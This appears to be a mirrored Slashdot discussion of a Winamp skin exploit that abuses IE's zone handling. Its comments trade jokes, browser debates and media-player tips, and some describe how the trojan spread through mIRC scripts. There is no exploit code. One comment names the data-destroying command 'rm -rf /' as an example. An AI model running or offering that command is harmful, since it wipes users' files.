Slashdot Mirror


Winamp Skin Exploit in the Wild

An anonymous reader writes "Secunia.com has announced an exploit (derived from xml escaping the Internet zone into IE's local zone) that exploits Winamp's habit of automatically installing skins. Currently all versions of Winamp are affected. Details on the Winamp forums - apparently an exploit is already in the wild, and spreading."

397 comments

  1. yet another way... by ryane67 · · Score: 5, Funny

    to compromise a system..

    Luckily the masses of windows users are content to use windows media player which should slow the spread of this.

    --
    ?SYNTAX ERROR IN LINE 42
    1. Re:yet another way... by BoldAC · · Score: 4, Insightful

      Yet another way?

      Seems like the same old crap to me...

      You convince some sucker to download and load something that isn't what it says it is. We've reported aim exploits that hide themselves as screensavers recently.

      It's a major security problem when a program blindly executes something. Period.

      It's a major security problem when people download untrusted winamp skins on IRC.

      What can you do?

    2. Re:yet another way... by black+mariah · · Score: 5, Funny
      What can you do?
      Well, when I'm dictator it will be legal to punch people in the face for doing stupid shit like that. Ought to help out a bit. Imagine a technician comes to your home, you tell them what's wrong and what you did... WHAM! A nice fist in the face. Hell of a deterrent, that.
      --
      'Standards' in computing only impress those who are impressed by things like 'standards'.
    3. Re:yet another way... by Doctor+O · · Score: 1

      At least where I work, that would make up a nice training, no more need for the gym. And there still is the possibility of the greatest career change EVAR:

      Becoming a circus boxer.

      One can dream, at least. ;)

      --
      Who is General Failure and why is he reading my hard disk?
    4. Re:yet another way... by Carnildo · · Score: 2, Funny

      I'm using Winamp 2 skins on XMMS. Am I vulnerable to this?

      --
      "They redundantly repeated themselves over and over again incessantly without end ad infinitum" -- ibid.
    5. Re:yet another way... by Anonymous Coward · · Score: 1, Interesting

      Use a firewall and don't give winamp access to the internet?

      WTF else!

    6. Re:yet another way... by shish · · Score: 2, Funny

      I think the safest thing to do would be to use Winamp 4; no exploits for that :)

      --
      I mod down anyone who says "I will be modded down for this", regardless of the rest of their comment
    7. Re:yet another way... by Speare · · Score: 1

      Imagine a technician comes to your home, you tell them what's wrong and what you did...

      But do you have a 27B-6 form? I'm a bit of a stickler for details.

      --
      [ .sig file not found ]
    8. Re:yet another way... by Anonymous Coward · · Score: 0

      I'm a moron and I got infected by this.
      I clicked on a link that seemingly pointed towards a JPG image. (looked something like "http://somewhere.com/funnyporn.jpg --- LOOOOOOOOL")

      It then asked me to download a ".wjz" or something.
      I was quite drunk at the time, and thought it was a winamp audio stream, so I downloaded it.
      It's a "Winamp Eztension" file, so it can provide limited capabilities (it cannot really execute its own code, but it can manipulate IRC in order to tell IRC what music is playing etc)

      It created a script to spam the link to the exploit in IRC, in order for others to click it.

      It's relatively easy to get rid of, just go into the MIRC scripts viewer and delete the bad entries "it's called mirc-hax0r" or similar

    9. Re:yet another way... by homer_ca · · Score: 1

      "when I'm dictator it will be legal to punch people in the face for doing stupid shit like that"

      And once someone invents a way to punch people through the Internet your plan will be complete.

    10. Re:yet another way... by Anonymous Coward · · Score: 0

      Let's extend this to untrusted images, text files, emails, web pages, etc.

      The actual problem is that something that is considered passive (like a skin, text document, image, etc) can do something active (such as compromising a system). Even if you know it's bad to execute untrusted executables, would you really stop and think twice about viewing untrusted images, or in a similar way, using some noname Winamp skin? What's the worst that can happen? Make Winamp look ugly?

    11. Re:yet another way... by gangien · · Score: 1

      what are you a Maddox wannabe?

    12. Re:yet another way... by Dmala · · Score: 1

      And once someone invents a way to punch people through the Internet your plan will be complete.

      Oh, man... whoever does that is gonna make a ton of money.

    13. Re:yet another way... by Anonymous Coward · · Score: 0

      What are you, a maddox fanboy?

    14. Re:yet another way... by gangien · · Score: 1

      I like his 'work' but when I read that post I thought immediately of maddox.

    15. Re:yet another way... by Yer+Mom · · Score: 1

      Yeah! Now I can punch the monkey for real!

      --
      Never mind Spamassassin. When's Spammerassassin coming out?
    16. Re:yet another way... by darkmeridian · · Score: 1

      Well, when I'm dictator it will be legal to punch people in the face for doing stupid shit like that. Ought to help out a bit. Imagine a technician comes to your home, you tell them what's wrong and what you did... WHAM! A nice fist in the face. Hell of a deterrent, that.

      I don't know about you, but that'd make me NOT call tech support.

      --
      A NYC lawyer blogs. http://www.chuangblog.com/
    17. Re:yet another way... by Destoo · · Score: 1
      This quote is currently in second place here

      <Zybl0re> get up
      <Zybl0re> get on up
      <Zybl0re> get up
      <Zybl0re> get on up
      <phxl|paper> and DANCE
      * nmp3bot dances :D-<
      * nmp3bot dances :D|-<
      * nmp3bot dances :D/-<
      <[SA]HatfulOfHollow> i'm going to become rich and famous after i invent a device that allows you to stab people in the face over the internet



      --
      Gaming and technology news in French. TC
    18. Re:yet another way... by black+mariah · · Score: 1

      Yeah, I can see why someone would get that idea. I like Maddox's stuff but I'm not trying to rip him off or anything. When I'm trying to rip someone off, I make sure you know it. ;)

      --
      'Standards' in computing only impress those who are impressed by things like 'standards'.
  2. Damn you Britney! by ZipR · · Score: 5, Funny

    I knew that your oh-so-sexy winamp skin would be my downfall.

    1. Re:Damn you Britney! by Anonymous Coward · · Score: 3, Funny

      I think we can blame Frank Sinatra for this one though...

      I've got you under my skin
      I've got you deep in the heart of me
      So deep in my heart, that you're really a part of me
      I've got you under my skin

    2. Re:Damn you Britney! by ImaLamer · · Score: 1

      This is somewhat relevant as it's about an mp3 player... Free iPods. An actually legit pyramid scheme. There's a Wired article about it here. Check it out.

      I notice however that you do post a referral link to freeipods.com... how horrible is that?

      In fact, this seems to be against their terms of service.

      (BTW, I see nowhere until signing up that you need to get 5 people to activate an account, damn pyramid schemes!)

    3. Re:Damn you Britney! by argStyopa · · Score: 3, Funny

      I knew that your oh-so-sexy winamp skin would be my downfall.
      Well duh.

      Pretty Girl + Virus = trouble in just about any context.

      Throw "wife" into the equation and the result may be expressed both in terms of $$ and an unreal number.

      --
      -Styopa
  3. Mozilla by linuxci · · Score: 5, Insightful

    One of the winamp betas had the option to use the mozilla engine rather than the IE one. Shame they never spent more time on this feature; then they could easily tell people they could fix this exploit by turning off the MS Engine.

    1. Re:Mozilla by JanusFury · · Score: 4, Informative

      Yeah, I remember that option. Funny, it never worked. I'm still not sure if it was Nullsoft's fault, or if moz embedding is just flaky. I can't really think of any apps I have that embed Gecko - it's all pretty much IE these days.

      --
      using namespace slashdot;
      troll::post();
    2. Re:Mozilla by linzeal · · Score: 3, Insightful
      Isn't nullsoft part of AOL, which funded netscape which created most of the mozilla engine?

      Using anything from Microsoft's API in this day and age of alternatives is lazy programming, imho.

    3. Re:Mozilla by Anonymous Coward · · Score: 5, Informative

      This isn't an IE exploit. It can affect Firefox too if you're not careful. It's entirely a Winamp exploit, cause even in firefox it will prompt you to download the file, and open it... if you open it, you're affected. :/

      The link is dead now, but I'm guessing the exe file just looks to see if mIRC is running, and gets the path, and extracts+runs some mIRC scripts. Classic trojan technique. Really not terribly difficult to make.

      ^^^
      taken from Winamp Forums.

      So does it matter?

    4. Re:Mozilla by Neophytus · · Score: 1

      The defunct minibrowser used the IE API to display html. Much easier for them to do that than to install gecko with the client.

    5. Re:Mozilla by Anonymous Coward · · Score: 0

      or maybe you just didn't follow instructions. you needed to register the mozilla activex control first. worked just fine for me after doing that.

    6. Re:Mozilla by Enrico+Pulatzo · · Score: 1, Flamebait

      Reinventing the wheel for every project is a form of laziness too--you're too damn lazy to learn about existing APIs. Tools exist for a purpose, and people too lazy/prejudiced/"good" to use them should shut up, imho ;)

    7. Re:Mozilla by Anonymous Coward · · Score: 0

      Actually, it is funny you make this claim; because I can't think of any stable applications these days that embed IE. Come to think of it, the only app I can think of that embeds a browser and appears stable is
      http://www.activestate.com/Products/Komodo/?_x=1

    8. Re:Mozilla by Aggrajag · · Score: 2, Informative

      MyIE2 has embedded Gecko browser and it seems to work ok. http://www.myie2.com/

    9. Re:Mozilla by bannerman · · Score: 1

      The Winamp loophole isn't that big of a deal, by itself. Sure, as a Mozilla user, if you download a skin made by some jerk who put a trojan into it you might get nailed. The real problem is that IE automatically installs the skins without user intervention. You all remember the email forward that went around telling people to delete the teddy bear icon from the windows\system folder, don't you? The one that made Windows unbootable? On a secure platform, you're safe unless you become gullible. Same deal here. The real security hole belongs to IE.

      --
      I keep forgetting my place. Jesus is for losers. Why do I still play to the crowd?
    10. Re:Mozilla by Quarters · · Score: 2, Informative
      Maxthon (aka MyIE2) uses an ActiveX version of the Gecko engine. When Maxthon is in that mode most of the standard features don't work, the right-click menu is truncated down to just a few core items, and the overall experience isn't all that hot.

      The author of Maxthon has said that the engine-switch option is there so web designers can check their pages quickly without having to have a multitude of browsers on their machines. It's not intended to be a generalized replacement for the IE libs that Maxthon is built on.

    11. Re:Mozilla by MustardMan · · Score: 1

      Tools exist for a purpose, and people too lazy/prejudiced/"good" to use them should shut up, imho ;)

      Even if those tools are poorly implemented, broken, full of security holes, or any of ten other negative things that can be said about many microsoft API's? (or indeed many non-MS API's as well - I'm not a complete zealot here) My point is, just because something is there already doesn't mean it's the best way to do it.

    12. Re:Mozilla by unixbob · · Score: 4, Informative

      not quite. It's a cross browser problem because whatever browser you use will pass the .wsz or .wal straight to winamp. But the embedded browser in winamp (which is IE) executes an .exe that's included within the .wsz archive because it thinks it's being run from the local zone instead of the Internet Zone. Therefore it's a bug in IE and Windows (and winamp).

      The bug isn't that the browser passes the file to the correct handler app, but that the app itself executes code it shouldn't.

      --
      The Romans didn't find algebra very challenging, because X was always 10
    13. Re:Mozilla by Anonymous Coward · · Score: 0

      Are you suggesting that the Nullsoft programmers design and code a totally new operating system as well?

    14. Re:Mozilla by ricotest · · Score: 1

      I was dead certain it used the IE engine, so I checked the new site at http://www.maxthon.com/ - lo and behold:

      Maxthon is a powerful web browser with a highly customizable interface. It is based on the Internet Explorer engine (your most likely current web browser) ...

      That said, the original MyIE2 site's screenshots do look a lot like Mozilla in places. But the site never mentions Mozilla, while Maxthon's (stupid name) site mentions IE explicitly.

    15. Re:Mozilla by Anonymous Coward · · Score: 0

      Not to mention Mozilla, Firefox, Thunderbird...

    16. Re:Mozilla by avdp · · Score: 1

      I can think of a few apps that embed Gecko. Firefox is one of them (I know, it's also a Mozilla foundation project so it doesn't count). AOL's Compuserve embeds Gecko. ActiveState's Komodo embeds Gecko. A bunch of other programs on Linux embeds Gecko.

    17. Re:Mozilla by JanusFury · · Score: 1

      Actually, it wouldn't work on my box even when I registered the activex control. I know, because I tested the activex control by itself in VB and it couldn't find some moz components. YMMV, I guess.

      --
      using namespace slashdot;
      troll::post();
    18. Re:Mozilla by neocrono · · Score: 1

      Alias Maya 6.0 has an embedded Gecko browser that's modified to support hyperlinks in MEL, Maya Embedded Language, giving it access to the majority of Maya's underpinnings. Every menu option or button in the program executes a MEL command (or several). Kinda wonder if that's exploitable. It also includes a customized java Apache httpd (I'm sure there's some subproject name I'm missing here) with search capabilities based on Lucene for all the online documentation.

    19. Re:Mozilla by Anonymous Coward · · Score: 0

      Why does a media player need a browser engine at all?

    20. Re:Mozilla by Anonymous Coward · · Score: 0

      then this is the fault of Winamp...and MS should sue them for introducing a hazard...

    21. Re:Mozilla by HobophobE · · Score: 2, Interesting

      Offtopic, etc. but I am curious.

      How difficult (and guessing it's feasible, this is probably in the works) would it be to build with Mozilla an emulation of IE's embed? In other words, will there come a day when one could force a Mozilla embed by overriding the IE version?

      --

      -HobophobE
      Nothing laughs forever.
    22. Re:Mozilla by Red+Alastor · · Score: 1

      No, he suggests they use the best tools, not that they design some of their own.

      --
      Slashdot anagrams to "Sad Sloth"
    23. Re:Mozilla by irc.goatse.cx+troll · · Score: 1

      That day is now, or some date in the past to be precise. Look for "IEpatcher.exe", I think it's an official mozilla project tool.

      --
      Pain lasts, kid. Its how you know you're alive. Sometimes I think this growing up thing is just pain management-TheMaxx
    24. Re:Mozilla by ajs318 · · Score: 2, Insightful

      If I had mod points, you would be Insightful. However, I haven't, so I'm replying. A media player does not need a browser engine. mpg321 hasn't got one, and it does just fine.

      The real problem is that DOS was never designed to be networked, and that carried over into Windows. NT's access control is based on VAX/VMS, which is rather OTT for most people's requirements, and so most people simply don't use it. Unix/Linux/OSX access control, while less sophisticated, is at least more likely to be used properly.

      Hardware no-execute (NX) is an absolute red herring in this context, BTW. It can always be bypassed in software -- otherwise you would have a Computationally Incomplete system -- and, if you can persuade a user to execute arbitrary software on a system without NX, you can just as easily persuade a user to execute the NX bypass exploit on a system with NX.

      --
      Je fume. Tu fumes. Nous fûmes!
    25. Re:Mozilla by Keeper · · Score: 1

      The "zone" the control uses is set by the application hosting the control. IE is doing exactly what winamp is telling it to. This problem is all winamp.

    26. Re:Mozilla by Snaller · · Score: 1

      I can't really think of any apps that NEED to embed either (except MSIE).

      Haven't seen Winamp, but i'd guess the interface looks screwed up - none of these programs seem to take into account that the user might have disabled stylesheets.

      --
      If Google really cared they would fix Android Chrome to reflow text, instead of discriminating
    27. Re:Mozilla by Enrico+Pulatzo · · Score: 1

      To some degree yes. If I use an API that starts out insecure as long as I continue to still use that API, the provider can still fix the problems with that API so I don't have to re-invent the wheel. There are of course, some caveats, but poor implementations shouldn't prevent the usage of useful tools.

  4. Can I name the worm?? by Lux · · Score: 4, Funny

    I propose "flensing."

    1. Re:Can I name the worm?? by Anonymous Coward · · Score: 0

      Congratulations, you made it to the 'f's.

    2. Re:Can I name the worm?? by irc.goatse.cx+troll · · Score: 1

      I'd go with another F, Flayer.
      http://www.google.com/search?q=define%3A+flay&btnG=Search&hl=en&lr=&ie=UTF-8&safe=off&c2coff=1
      See Also: Buffy the vampire slayer, evil willow, 'Bored Now'.

      --
      Pain lasts, kid. Its how you know you're alive. Sometimes I think this growing up thing is just pain management-TheMaxx
  5. Damn Britney Spears virus by Anonymous Coward · · Score: 0
    Agh, give me viruses that delete my HD ; Give me viruses that break the whole box...

    But please God, don't give us forced Britney Spears !

  6. Further evidence that skinning is stupid by pestie · · Score: 5, Funny

    Seems to me I was just bitching about skinning and mentioned that security holes were one possible (but unlikely) down-side. I love when the universe makes my point for me.

    1. Re:Further evidence that skinning is stupid by jo42 · · Score: 2, Insightful

      Alas, people like shiny, blinky, glowy things aka bling.

      I won't bother saying what I think of 'skinning' on account it would be moderated as a troll or less because most people like shiny, blinky, glowy things aka bling and I don't...

    2. Re:Further evidence that skinning is stupid by name773 · · Score: 1

      which is another great use of anonymous posting :)

    3. Re:Further evidence that skinning is stupid by Neon+Spiral+Injector · · Score: 1, Insightful

      If I were to like shiny, blinky, glowy things aka bling, which I don't, I'd want my entire UI to be shiny, blinky, glowy things aka bling. I find apps that don't use the default toolkit (in any OS) to really clash with everything else.

      Sure MacOS X is pretty, and consistent. It would seem that Apple agrees with me. So why do they make their QuickTime player for Windows so out of place? I like non-destructive configuration options to be auto applied (like GNOME and Mac OS do), but that style of interface is in total contrast with Windows OK, Apply, Cancel system.

      I think it was Winamp's fault that all media players now have to have their own skinable widget set. I wish this exploit would do something to stop the madness, but I fear not.

    4. Re:Further evidence that skinning is stupid by StalinsNotDead · · Score: 2, Insightful

      There are those that either forget to check Post Anonymously or out of some measure of honor or apathy, refuse to do so.

      --
      Thanks to the internet, we can now all die alone together! -SomeWoman
    5. Re:Further evidence that skinning is stupid by It'sYerMam · · Score: 1
      I can say that I do like pretty media players. The thing is, the standard GUI is not designed with a Hi FI in mind - It has buttons with little triangles, squares, circles, vertical lines, volume knobs, trays, etc. You can't do this in a regular toolkit, so I think it's nice to get this back.
      I mean, no-one complains that the Hi-Fi is in a different style to the table - that's because they're completely different things.

      Difficult to put my finger on it, but I like being able to select a beautiful, shiny, fake-LEDy skin to make my media player MINE.

      --
      im in ur .sig, writin ur memes.
    6. Re:Further evidence that skinning is stupid by Carnildo · · Score: 1

      I like skinning because it lets me turn whatever unusable monstrosity the developer thought was "cool" back into something usable.

      I also like skinning because it's a suitable punishment for those developers.

      --
      "They redundantly repeated themselves over and over again incessantly without end ad infinitum" -- ibid.
    7. Re:Further evidence that skinning is stupid by xmundt · · Score: 2, Interesting

      Actually, I kind of like skinning...although I don't "need" it. For example, Opera has a skin called "Executive" that is my preferred look. Why? not because I am "C" level, but, because I am a woodworker!
      Also, the whole point of computers is to allow flexibility and the ability to customize the tool to fit our hand.
      I do, though, draw the line at methods of skinning that end up being security risks... I am not sure that skins that have executable parts are a good thing...

      --
      YAB - http://blog.beemandave.com/
    8. Re:Further evidence that skinning is stupid by Nurgled · · Score: 1

      Why does the application have to look like a hi-fi? It's thinking like that which brings us twisty knob widgets to operate with the mouse, and millions of users who try to carefully articulate the mouse in small circles to operate it, only to be frustrated and confused when the bottom part of the motion reverses what the top part did.

      Metaphors can be nice, but just having buttons with the familiar play, stop and pause buttons would be enough for this kind of interface.

    9. Re:Further evidence that skinning is stupid by Proc6 · · Score: 1
      Along this line, can anyone recommend a Windows based media player that plays most all formats (mp3, divx, avi, mpeg, whatever), that ISNT some overly feature laden, skinnable piece of Britney candy?

      WMP and RealPlayer make me gag. WinAmp can probably be skinned lame, but it seems to not play DiVX so very well (and still it's a zillion feature candy looking player).

      Anything for the minimalist? I'd like a standard windows UI screen and basic buttons, is that so hard?

      --

      I'm Rick James with mod points biatch!

    10. Re:Further evidence that skinning is stupid by Neon+Spiral+Injector · · Score: 1

      As much as I complained, I'm surprised that I've never tried it, but I have heard very good things about Media Player Classic. Maybe I'll give it a shot now too.

    11. Re:Further evidence that skinning is stupid by Condor7 · · Score: 2, Informative



      Can anyone recommend a Windows based media player that plays most all formats (mp3, divx, avi, mpeg, whatever), that ISNT some overly feature laden, skinnable piece of Britney candy?

      Media Player Classic at SourceForge, Afterdawn, or Divx Digest.

    12. Re:Further evidence that skinning is stupid by Anonymous Coward · · Score: 0

      I like skinning, because I like to use Opera, but Opera's default look is butt-ugly.

    13. Re:Further evidence that skinning is stupid by irc.goatse.cx+troll · · Score: 1

      Mplayer is nice, though there's no good win32 gui for it yet.
      http://ftp5.mplayerhq.hu/mplayer/releases/win32-beta/
      Maybe someone can roll something simple out to wrap it like kmpg123 does mpg123?
      (btw, I know gmplayer runs on windows also, but that's still way too buggy, in addition to being just as bad in the bling-over-features department as everything else)

      --
      Pain lasts, kid. Its how you know you're alive. Sometimes I think this growing up thing is just pain management-TheMaxx
    14. Re:Further evidence that skinning is stupid by Proc6 · · Score: 1

      After the posts above recommended it, I am using the Media Player Classic from Sourceforge, and it's _exactly_ what I was looking for. It's like the old school Windows 95 media player. Simple, to the point. Loads fast. It's like 1.5 megs. Why can't more software be like this :`(

      --

      I'm Rick James with mod points biatch!

    15. Re:Further evidence that skinning is stupid by irc.goatse.cx+troll · · Score: 1

      sidenote: you can still get the oldschool windows media player, start -> run mplayer2. Unless you mean the old old media player (~win3.11 era), which is around there somewhere but can't think of the name.

      --
      Pain lasts, kid. Its how you know you're alive. Sometimes I think this growing up thing is just pain management-TheMaxx
    16. Re:Further evidence that skinning is stupid by It'sYerMam · · Score: 1
      Well, that's what the forward triangle, triangles + bar, two bars and square are for. Surely you recognise them?
      Not sure what you mean about "the bottom part of the motion..." but yes, twisty knob widgets can be extremely annoying. OTOH, many skins come without them - you're not forced to use them.
      There are so many different skins that you have both the convoluted and the simple - pick what you want.

      Alternatively, use rhythmbox or something.

      --
      im in ur .sig, writin ur memes.
    17. Re:Further evidence that skinning is stupid by djtrialprice · · Score: 1

      Unless you mean the old old media player (~win3.11 era), which is around there somewhere but can't think of the name.

      It's called sndrec32 (still on WinXP) and I occasionally still use it. I always thought it was pretty cool. Who doesn't want to listen to their music backwards?

  7. Just another reason by bunburyist · · Score: 0, Redundant

    To use XMMS! XMMS is a wonderful media player XMMS is a multimedia player for unix systems. XMMS stands for X MultiMedia System and can play media files such as MP3, MOD's, WAV and others with the use of Input plugins. XMMS is mainly targeted at music playback, but through thirdparty plugins some rudimentary video capabilities exists, but there are much better systems other than XMMS for video support. XMMS will not be vulnerable to this exploit...it is Highly customizeable and it has an extensive plugin system. Winamp is (currently) being run by AOL which as we all know is evil and heartless...after what they did to poor rich justin. poor poor justin.

    1. Re:Just another reason by happyemoticon · · Score: 2, Insightful

      Damn dude, I was going to step up and proselytize 'NIX/XMMS, but you beat me to it:) By the same token you could support good ol' Winamp 2, which is basically the same thing. Ooo, winamp 5; look at all the useless, animated, colorful features!

    2. Re:Just another reason by Kethinov · · Score: 1

      AFAIK XMMS doesn't run in Windows at all.

      --
      You're right, I wouldn't steal a car. But if it were possible, I sure as hell would download one!
    3. Re:Just another reason by shawn(at)fsu · · Score: 0, Redundant

      XMMS has been included in SuSElinux since at least 8.2. It's great, it has the interface of winamp with none of the bloat that I've come to hate from winamp. Check it out

      I didn't think this was redundant at all good thing I browse at -1.

      --
      500 dollar reward for tip(s) leading to the arrest of the person(s) who stole my sig.
    4. Re:Just another reason by Kethinov · · Score: 1

      Winamp5 added one very important feature that Winamp2 didn't have (that XMMS has had for years); the ability to reformat the playlist display away from Artist - Song Name to whatever you want. (In my case Artist - Album - Track - Song Name)

      --
      You're right, I wouldn't steal a car. But if it were possible, I sure as hell would download one!
    5. Re:Just another reason by name773 · · Score: 2, Insightful

      see? more of a fix than you'd first assume :)

    6. Re:Just another reason by name773 · · Score: 1

      500 dollar reward for tip(s) leading to the arrest of the person(s) who stole my sig.
      they went that way ->

    7. Re:Just another reason by datadriven · · Score: 1

      Another reason I'm glad I don't use windows.

    8. Re:Just another reason by Saganaga · · Score: 1

      Not true. Winamp2 allows you to change the playlist display. From memory (I have WA5 so it may be different now): Preferences->Plugins->Input->Nullsoft MPEG Audio Decoder->Configure.

      I always changed this to show the album like you mentioned.

    9. Re:Just another reason by rokzy · · Score: 1

      Get the crossfade plugin.

      XMMS+Crossfade is great for things like LOTR soundtrack or just regular albums where songs go over tracks - no horrible pauses.

      I just wish it had decent album management. imo Musicmatch Jukebox has the best library management system.

    10. Re:Just another reason by Kethinov · · Score: 1

      I imagine you could use Cygwin to compile X and then compile XMMS. Winamp skins are compatible with XMMS but XMMS doesn't use IE.. or any browser.. for anything. That would eliminate the security risk.

      Of course unchecking "modern skin support" in Winamp would remove the security risk as well.

      --
      You're right, I wouldn't steal a car. But if it were possible, I sure as hell would download one!
    11. Re:Just another reason by Kethinov · · Score: 1

      Good fuckin lord. Way to hide it on me.

      I tried literally for years to find a way to do that in Winamp2 unsuccessfully. Nullsoft would get a -4 on a scale of 1 to 10 in option menu design.

      --
      You're right, I wouldn't steal a car. But if it were possible, I sure as hell would download one!
    12. Re:Just another reason by Saganaga · · Score: 1

      I agree. I just happened to stumble on the option. I have a sort of obsessive/compulsive tendency to check out every single possible option in a program, so I guess that's why I found it.

    13. Re:Just another reason by Kethinov · · Score: 1

      Blow me. Not a single person I know knew about Winamp2's ability to do that. We all welcomed Winamp5 with open arms for that ability. Did it occur to you that Nullsoft might just have made a dumb choice regarding where to put that option? Stupid anonymous flamers.

      --
      You're right, I wouldn't steal a car. But if it were possible, I sure as hell would download one!
    14. Re:Just another reason by Osty · · Score: 2, Informative

      XMMS is a wonderful media player XMMS is a multimedia player for unix systems
      (emphasis added by me)

      And Winamp is a multimedia player for Windows systems (with the exception of a horribly crappy alpha version of the now-dead 3.0 release of Winamp that was made available on Linux, but that hardly counts does it?). If I'm a Winamp user, I'm using Windows, and so XMMS is not an option. Why would I change my entire operating system simply to get a media player that started life as a duplicate of the one I already have on Windows (and XMMS still is little more than a Winamp-wannabe)?

    15. Re:Just another reason by mla_anderson · · Score: 1

      No need to compile X for Cygwin, it's already done for you.

      --
      Sig is on vacation
    16. Re:Just another reason by Anonymous Coward · · Score: 0

      Why would I change my entire operating system simply to get a media player

      If you didn't know what Word documents are like to Linux users, you do now :-)

    17. Re:Just another reason by JAD+lifter · · Score: 1


      I am too lazy to go look on bugtraq but I seem to remember a while back there was a root level exploit for systems running XMMS. So nothing is perfect, although XMMS probably still is better than winamp.

    18. Re:Just another reason by JAD+lifter · · Score: 1

      XMMS has been included in SuSElinux since at least 8.2.

      I think that like every single linux distro that I have ever used came with XMMS. As far as SuSE is concerned, I have a SuSE 7.3 install DVD and it has XMMS on it and I am sure that every earlier version does as well. XMMS is probably one of the most common nonessential pieces of software included with most distros when you really think about it.

    19. Re:Just another reason by JAD+lifter · · Score: 1

      If you didn't know what Word documents are like to Linux users, you do now :-)
      I have never come across a word document that I couldn't view on Linux. I am sure that you could create one but I don't think that most people use the really flaky complex features of Word that all the Linux equiv of Word cannot handle.

  8. Am I the only one... by psoriac · · Score: 4, Interesting

    who unchecks every option in any program I install that begins with "Automatically [check for/download] and install ..."?

    --
    I browse Slashdot at +3, Funny
    1. Re:Am I the only one... by Anonymous Coward · · Score: 0

      Pretty much, yes.

    2. Re:Am I the only one... by Frnknstn · · Score: 1

      In this case it is worse than that. I also always uncheck those options, and selected to have no file types associated to Winamp. Winamp automatically associates itself with the .WSZ and .WAL files regardless of the options you select.

      --
      If it's in you sig, it's in your post.
    3. Re:Am I the only one... by telstar · · Score: 5, Funny

      I dunno, but I like posts whose entire message changes if you neglect to read the subject.

    4. Re:Am I the only one... by conteXXt · · Score: 1

      nope. there are many of us. Rise UP

      --
      The truth about Led Zep should never be told on /. (Karma suicide ensues)
    5. Re:Am I the only one... by traveyes · · Score: 1


      automatically, i uncheck anything "automatic".

      .

    6. Re:Am I the only one... by Anonymous Coward · · Score: 0

      who thought you should have said it like this?

      who likes posts whose entire message changes if you neglect to read the subject?

    7. Re:Am I the only one... by Anonymous Coward · · Score: 0

      You're not the only one, but I've found that when I help friends set up windows (for example) I have to resist the urge, because if I don't leave windows update at least automatically downloading patches, they will never do it themselves, no matter how often I remind them.

      I know for a fact that those of us who check through every option for every new program are a dying breed, and I'd also just like to throw in a little random hatred for programmers who split up their programs options among several different menus; you guys SUCK!

    8. Re:Am I the only one... by Anonymous Coward · · Score: 0

      who agrees?

    9. Re:Am I the only one... by Snaller · · Score: 1

      Yeah, i'm sure a lot of us check things he installs :)

      --
      If Google really cared they would fix Android Chrome to reflow text, instead of discriminating
    10. Re:Am I the only one... by DNS-and-BIND · · Score: 1

      Then you get nag screens every time you start the product, asking you if you want to download and install the latest version (Acrobat, looking at you).

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
  9. Macs by AKAImBatman · · Score: 0, Flamebait

    Makes me glad I use iTunes on a Mac. At least Apple doesn't decide *for me* that I NEED an insecure web browser in EVERY APPLICATION on the operating system.

    The fact that OS X has not yet had one critical exploit speaks for itself. (And yes, OS 7-8 *did* have quite a few exploits and viruses.)

    1. Re:Macs by black+mariah · · Score: 0, Flamebait

      The Winamp programmers made a choice to use the IE shit, moron. If you're going to flame, at least be somewhat intelligent about it.

      --
      'Standards' in computing only impress those who are impressed by things like 'standards'.
    2. Re:Macs by AKAImBatman · · Score: 1

      That should be OS 7-9. I've really got to start proof reading.

    3. Re:Macs by Egekrusher2K · · Score: 2

      http://secunia.com/advisories/11622/ Yes it has, wannabe nerd. Don't talk the crap unless you can back it up.

      --
      Listen to my experimental-industrial-techno!
    4. Re:Macs by EulerX07 · · Score: 1

      You also have to start knowing what you're talking about.

    5. Re:Macs by AKAImBatman · · Score: 1

      RTFA. It requires Internet Explorer 5.2. That's not the default browser on Mac OS X.

    6. Re:Macs by AKAImBatman · · Score: 1

      No, they used system services available to them, instead of choosing a third party solution like the rest of the world does. Why did they do that? Because Windows integrates a web browser!

    7. Re:Macs by Kethinov · · Score: 1

      They integrate a shitty web browser. No programmer in their right mind would make use of this "available system service".

      --
      You're right, I wouldn't steal a car. But if it were possible, I sure as hell would download one!
    8. Re:Macs by Anonymous Coward · · Score: 0

      you mean that article that says:
      This has been confirmed on Macintosh OS X using Safari 1.2.1 (v125.1) and Internet Explorer 5.2. Other browsers and applications supporting URI handlers may also be used as attack vectors.

      so, what is the default browser on a Mac these days?

      i see Safari in TFA

    9. Re:Macs by Egekrusher2K · · Score: 1

      I didn't say it was common. He said they don't exist. I was merely proving him wrong.

      --
      Listen to my experimental-industrial-techno!
    10. Re:Macs by name773 · · Score: 1

      would this help it out?

    11. Re:Macs by Anonymous Coward · · Score: 0

      Hate to break it to you, but that's not a critical exploit. In order to do damage, the user MUST have a script lying around that can do said damage, and the attacker MUST know what that script is. Even assuming that the attacker does find a shortcut to 'rm -rf /', he still can't delete system files thanks to the system's security.

      A "major" rating perhaps, but definitely not Critical.

    12. Re:Macs by BoldAC · · Score: 1

      Where do you see this quote?

    13. Re:Macs by Davak · · Score: 1

      Can anybody confirm this quote?

      I can't find it anywhere...

    14. Re:Macs by Anonymous Coward · · Score: 0

      You're just jealous. ;-)

    15. Re:Macs by Gadget_Guy · · Score: 1

      It was in the link from a message posted by Egekrusher2K (610429) a few messages up the chain from here.

      It was in reply to someone who said that MacOS X had no problems like this Winamp one. It was not referring to the original Winamp problem itself.

    16. Re:Macs by Phroggy · · Score: 2, Insightful
      Makes me glad I use iTunes on a Mac. At least Apple doesn't decide *for me* that I NEED an insecure web browser in EVERY APPLICATION on the operating system.

      I realize you're trolling, but I'm bored...

      Yes, Apple DOES decide for you that you need a web browser in every application on the operating system. Is it insecure? Well, not that we know of right now, because Apple patches the holes when they're found, just like Microsoft does (but yes, Apple's browser does have fewer security holes than Microsoft's).

      Safari is 13MB, 10.1MB of which is localized text (for menus, dialog boxes, etc.) for languages other than English. It would be less than 3MB if you stripped that out (and you can get a program to do that for you, system-wide, if you want). Why? Because it doesn't include the HTML rendering engine.

      The fact that OS X has not yet had one critical exploit speaks for itself. (And yes, OS 7-8 *did* have quite a few exploits and viruses.)

      Wrong again. According to Steve Jobs:
      In Mac OS X's history--four and a half years--we've had 43 security updates fixing security issues, but only 2% of them were critical. In Windows XP, which has been around for less time, they've had 77 security updates but 66% of them were critical in terms of the industry's nomenclature.

      By the way, if you're interested in the HTML rendering engine that Apple includes in Mac OS X and makes available to all applications (just like Microsoft does), the source code is here (it's LGPL). OK, so that's not like Microsoft. ;-)
      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
